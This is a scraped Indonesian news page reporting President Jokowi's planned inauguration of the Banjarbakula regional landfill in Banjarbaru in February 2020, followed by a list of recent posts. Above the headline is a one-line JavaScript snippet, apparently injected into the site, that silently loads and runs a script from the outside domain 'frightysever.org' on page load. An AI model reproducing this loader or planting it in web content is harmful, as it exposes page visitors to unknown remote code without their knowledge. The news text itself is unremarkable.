(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Sore ini, Presiden Jokowi Resmikan TPA Regional Banjarbakula


KANALKALIMANTAN.COM, BANJARBARU – Presiden Joko Widodo akan meresmikan secara langsung Tempat Pembuangan Akhir (TPA) Regional Banjarbarbakula di kawasan Gunung Kupang, Kecamatan Cempaka, Banjarbaru, pada Jumat (7/2/2020) sore.

Dari pantuan Kanalkalimantan.com, lokasi TPA Regional Banjarbakula mendapat penjagaan ketat pihak TNI maupun Polri. Untuk masuk ke dalam TPA sendiri harus menyertakan tanda pengenal khusus yang telah jauh hari disediakan. Pun, tamu undangan juga harus melewati pengecekan alat metal detector.

Hinggal pukul 16.30 Wita, nampak telah hadir Bupati dan Walikota se-Kalsel, jajaran kementrian, serta Kepala SKPD se-Provinsi Kalsel. Rencananya, Jokowi  akan meresmikan TPA Regional Banjarbakula didampingi  Menteri Lingkungan Hidup dan Kehutanan (LHK) Siti Nurbaya Bakar. Lalu, Jokowi juga akan melakukan penanaman bibit pohon di areal TPA Regional Banjarbakula.

Tidak hanya itu, Kementrian PUPR juga akan menyerahkan bantuan berupa alat berat guna operasional TPA. Kedatangan Jokowi sendiri disambut oleh ratusan siswa-siswa Pramuka yang telah menunggu.

 

Perlu diketahui, TPA Regional Banjarbakula telah beroperasi sejak akhir Desember 2019 lalu. Pada hari pertama operasional, pihak TPA telah melakukan uji coba dengan mempasok sampah dari Kota Banjarbaru sebanyak 100 ton dan sampah dari Pelaihari, Kabupaten Tanah Laut, sekitar 20 ton.

Hal tersebut diakui Kepala Unit Pengelola Teknis (UPT) TPA Banjarbakula Sumadi. Ia mengatakan, ratusan ton sampah ini diangkut mengunakan armada truk sampah. Uji coba ini akan dilanjutkan dengan sampah dari kabupaten/kota lainnya, pada keesokan hari.

“Ini wujud komitmen kita untuk mendukung program pemerintah dalam mengatasi sampah di Kalsel yang memiliki kuantitas sangat tinggi. Besok rencana masuk dari Banjarmasin dan daerah Banjarbakula akan memasok sampah ke sini,” katanya.

Pembangunan TPA ini telah dilaksanakan sejak 12 Mei 2017 hingga 30 November 2018 dengan anggaran Rp 150 miliar dalam kontrak multiyears 2017-2018.

TPA Regional Banjarbakula juga dilengkapi empat sel landfill dengan luas mencapi 8 hektare, unit pengolah lindi, bangunan cuci kendaraan, jembatan timbang, kantor dam pos penjagaan. Masa manfaat setiap sel TPA diharapkan bisa digunakan selama 10 tahun. Penggunaan sistem sanitary landfill dilakukan untuk membuat kawasan di sekitar tidak tercemar dan bau dari timbunan sampah. (kanalkalimantan.com/rico)

 

 

Reporter : Rico
Editor : Bie

 


Desy Arfianty

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

9 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

11 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

14 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

14 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

16 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

17 jam ago

This website uses cookies.